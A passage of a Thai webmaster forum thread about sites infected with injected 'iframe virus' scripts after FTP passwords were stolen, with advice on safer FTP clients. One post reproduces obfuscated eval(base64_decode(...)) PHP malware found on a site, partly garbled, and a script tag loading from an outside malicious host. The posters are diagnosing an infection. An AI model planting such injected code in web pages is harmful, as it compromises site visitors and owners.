Home Webboard ArticlesKnowledges  

ตอบ

ชื่อ:
อีเมล์:
หัวข้อ:
ไอค่อนข้อความ:

ใส่รูปในกระทู้ คลิก >>
Verification:
ธงชาติไทยมีกี่สี ตอบเป็นเลขอารบิก:

shortcuts: กด alt+s เพื่อตั้งกระทู้ หรือ alt+p แสดงตัวอย่าง


สรุปหัวข้อ

ข้อความโดย: music125500
« เมื่อ: 06, กุมภาพันธ์ 2013, 07:15:46 AM »

ขอบคุณคร้าบ แต่มันมาจากทางนั้นจริงๆหรอเนี้ย
ข้อความโดย: tonyjacson
« เมื่อ: 06, สิงหาคม 2012, 03:01:22 PM »

ขอ edit ครับ โฆษณาแอบแฝง
ข้อความโดย: เซียวเหล่งนึ่งฯ
« เมื่อ: 08, กุมภาพันธ์ 2012, 01:44:54 PM »

ถ้าติดล็อคของกูเกิล ต้องใช้เว็บมาสเตอร์ทูลขอตรวจสอบ
รอผล 24 ชั่วโมง
ข้อความโดย: beaing40
« เมื่อ: 07, กุมภาพันธ์ 2012, 07:56:09 PM »

ลองทำดูแล้ว เดียวต้องรอดูภายใน 24ชั่วโมงว่าได้ผลหรือไม่ เดียวจะเอาผลมาบอก
ข้อความโดย: rooodman
« เมื่อ: 19, สิงหาคม 2011, 12:24:14 PM »

ได้ความรู้ดีจัง เด๋วนี้คนที่เค้า newbielink:http://www.idesign.co.th [nonactive]บางทีเวลาต้องอัพโหลดข้อมูล FTP ไปให้ลูกค้ายังต้องเสี่ยงต่อการทำให้เว็บไซต์ของลูกค้าติดไวรัสได้ด้วยหากเครื่องเรามีไวรัสโดยไม่รู้ตัว
ข้อความโดย: xonetam24
« เมื่อ: 24, พฤษภาคม 2010, 06:04:12 PM »

โอวว...ได้ความรู้มาเยอะเรยยย :shocked:
ข้อความโดย: poonim
« เมื่อ: 10, พฤษภาคม 2010, 05:44:53 PM »

เเจ่มมากค่ะความรู้ที่ตามหามานาน ขอบคุณความรู้ที่นำมาตอบให้ฟังนะคะ
เป็นคำถามเเละหลายคำตอบที่ดีมากค่ะ
ข้อความโดย: seohostyim
« เมื่อ: 02, พฤษภาคม 2010, 06:08:07 AM »

ส่วนใหญ่ที่เห็นก็จะเป็น iframe นะครับ ตัวนี้เป็นไวรัสอยู่ในเครื่องเลย มันจะฝัง files .html ทุกชนิด
ข้อความโดย: เซียวเหล่งนึ่งฯ
« เมื่อ: 26, เมษายน 2010, 12:03:36 AM »

อย่างเจ่งเลย 
ขอบคุณหลายๆ 
ข้อความโดย: pollock
« เมื่อ: 25, เมษายน 2010, 11:36:41 PM »

แนะนำ CoreFTP – Secure FTP Client

ซอฟต์แวร์ประเภท FTP Client หากใครหลายๆคนที่ทำงานด้านเว็บไซต์ คงรู้จักกันดี เพราะซอฟต์แวร์ประเภทนี้ จะทำหน้าที่หลักในการเชื่อมต่อกับเซิฟเวอร์ หรือโฮสต์ เพื่อโอนถ่ายไฟล์ข้อมูลระหว่างคอมพิวเตอร์ที่บ้านของคุณขึ้นไปเก็บไว้บน เซิฟเวอร์ เช่นพวก ไฟล์หน้าเว็บ ไฟล์รูปภาพ ไฟล์สคริป ไฟล์สื่อต่างๆ แต่จะมีซอฟต์แวร์ FTP Client ที่ดีและฟรีสักกี่ตัวที่ปลอดภัยเหมือนซอฟต์แวร์ตัวนี้ครับ

จุดเด่นของซอฟต์แวร์ CoreFTP นี้ คือสามารถดาวน์โหลดมาใช้งานได้ฟรี (เวอร์ชั่นเสียเงินก็มีเหมือนกัน) แต่จุดเด่นอีกหนึ่งจุดที่สามารถเอาชนะ FileZilla ซึ่งเป็นซอฟต์แวร์ FTP Client ที่ฟรีเหมือนกันก็คือ CoreFTP มีความสามารถด้านความปลอดภัยในการบันทึกรหัสผ่านที่ท่านใช้ล็อกอินในรูปแบบ ของการเข้ารหัสไว้อีกหนึ่งชั้น ช่วยให้ท่านเชื่อมต่อ FTP ได้ปลอดภัยยิ่งขึ้น ต่างกับ FileZilla ที่ก่อนหน้านี้ใช้รูปแบบการเก็บข้อมูลเป็น text-plain ทำให้ไวรัส หรือสปายแวร์ต่างๆ ขโมยรหัสผ่านที่ท่านใช้ล็อกอินเข้าสู่ FTP นั้นไปได้อย่างง่ายดาย (เพราะเก็บไว้เป็นรหัสผ่านกันโต้งๆเลย ไม่ได้มีการเข้ารหัสไว้) เมื่อรหัสผ่านนั้นถูกขโมยไปแล้ว โดยส่วนมากเว็บไซต์นั้นจะถูกไวรัส เชื่อมต่อ FTP เข้าไป พร้อมกับแทรกสคริปที่เป็นไวรัส (หรือเรียกว่าไวรัส iframe) ลงไปยังไฟล์หน้าเว็บที่มีอยู่บนเซิฟเวอร์ หรือโฮสต์ของท่าน ทำให้ผู้ใช้งานเว็บไซต์ เมื่อเข้าสู่เว็บไซต์ของท่าน อาจเกิดอาการ Antivirus ร้องลั่นบ้านว่าพบไวรัสอยู่บนหน้าเว็บของท่านได้ และดีไม่ดีอาจถูก Google ตราหน้าเว็บของท่านว่าเป็น เว็บไซต์อันตราย ได้อีกด้วย

ทั้งนี้ก็อยากให้ทุกท่านลด ละ เลิก ในการใช้งาน FTP Client ที่ผ่านการ crack เพราะอาจเกิดเหตุการณ์เช่นเดียวกับการใช้งานบน FileZilla ได้ เพราะเราไม่ทราบว่า ผู้เขียน crack นั้น ได้วางยาดักรหัสผ่านมาพร้อมกับ crack ที่เขาเขียนหรือเปล่า หันมาใช้ของดีและฟรีกันเถอะครับ

ดาวน์โหลด: http://www.coreftp.com/download.html
ข้อความโดย: pollock
« เมื่อ: 25, เมษายน 2010, 11:32:18 PM »

เจอคล้ายๆที่ผปมเจอครับ โค๊ดแรกที่ให้ดูนั้นจะอยู่ในไฟล์ .php และไฟล์ที่มีการเชื่อมต่อกับฐานข้อมูล

โค๊ด: [Select]
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygneHJndycpKXtmdW5jdGlvbiB4cmd3KCRzKX
tpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1
hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD
8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7a
WYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8f
CgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdf
bWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14 XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk I2lzJywkcywkYSkpZ
?php

ส่วนไฟล์
โค๊ด: [Select]
<script src=http://forums.indianmoneyplus.com/cgi-bin/profile-edit.php ></script> ไฟล์นี้จะอยู่ก่อนถึง <body ครับ

และยังมีโค๊ดลิงค์ออกไปนอกหน้าเว็บอีก 4 บรรทัด จะอยู่ในไฟล์ .js ครับ อยู่ล่างสุดครับ
ข้อความโดย: กฤติยา
« เมื่อ: 19, เมษายน 2010, 12:20:29 AM »

เวลาคนเข้ามาดูบอร์ดและมีไวรัสอยู่ในเครื่อง อยู่แล้ว มีไวรัสมีโอกาสเข้าสู่เวปที่เรากำลังดูอยู่หรือเปล่า  ปัญหาคาใจ

คนเข้าบอร์ด จะใช้ได้แค่คำสั่งในบอร์ดครับ , ถ้าไม่เปิดช่องโหว่ไว้ก็ไม่สามารถทำอะไรกับระบบเว็บเราได้ (อย่างน้อยๆ ก็กัน SPAM ได้มั่งล่ะ)

* "บอร์ด" ในที่นี้อาจจะเป็น "CMS ยี่ห้อหนึ่ง" หรือ "โค้ดเว็บบอร์ดแจกฟรี" ความปลอดภัยมันแตกต่างกันจ้า

เห็นบางที่เค้าลงเว็บบอร์ด (แบบที่ได้มาจาก Free Source code from Google)

ใช้ได้ไม่เท่าไร นอกจาก SPAM แล้ว ไฟล์ในหน้าเว็บก็ยังโดน hack เปลี่ยนไปเป็นหน้าที่ใครซักคนทำให้ (โดยเราไม่ได้ขอ)

:wink:
:undecided:
ข้อความโดย: ไก่ขี้เมา
« เมื่อ: 14, เมษายน 2010, 01:25:13 AM »

สำหรับเรื่อง MySQL Attack พอจะมีบทความพวกนี้เป็นภาษาไทยอยู่บ้าง อันนี้ต้องปรึกษาอาจารย์กูเกิ้ลนะครับ

keyword : เจาะระบบ mysql port

เจอเยอะเลย
:shocked:

ลองค้นๆ ดูต่อด้วย FTP , HTTP ฯลฯ ก็คงจะพอมีให้อ่านให้ปวดหัวเล่นๆ ได้อีกเยอะ
:cheesy:
ข้อความโดย: เซียวเหล่งนึ่งฯ
« เมื่อ: 13, เมษายน 2010, 10:23:15 PM »

แคปพาสจากดีบียังไม่เคยเจอท่าน  อย่าให้เจอเลย 555+
แค่เอฟทีพีนี่ก็แทบแย่ละ  เอิ๊กๆ
ข้อความโดย: ไก่ขี้เมา
« เมื่อ: 13, เมษายน 2010, 05:40:02 PM »

มันจะมีผลกับคนที่ใช้รหัสเอฟทีพีเท่านั้นแหละ  ...

ผมคุ้นๆ ว่ามันมีการ attack จาก port ของ MySQL ได้ด้วยหรือเปล่าครับ

และถ้าเว็บที่ใช้ free webboard (แบบเขียนเองง่ายๆ) ส่วนมากมักจะเขียนขึ้นมาแบบง่าย และเก็บ user/pass ไว้ในไฟล์หนึ่งไฟล์ ซึ่งสามารถหาวิธีเอามาใช้ได้อย่างง่ายมากๆ

พอเอามาได้แล้วก็ดำเนินการยืมพอร์ดของ MySQL เพื่อเจาะเข้าไปแก้ไขอื่นๆ ต่อไป

....
ถ้าเข้าใจผิดก็ขออภัยครับ เรื่องเน็ตเวิร์กผมวางเก็บไว้นานมากแล้วล่ะ

(นี่ก็คิดอยู่ว่าจะเลิกทำคอม ไปจับงานเกษตรแทน :wink:)
Sitemap 1 2 3 4 5 6 
Back to top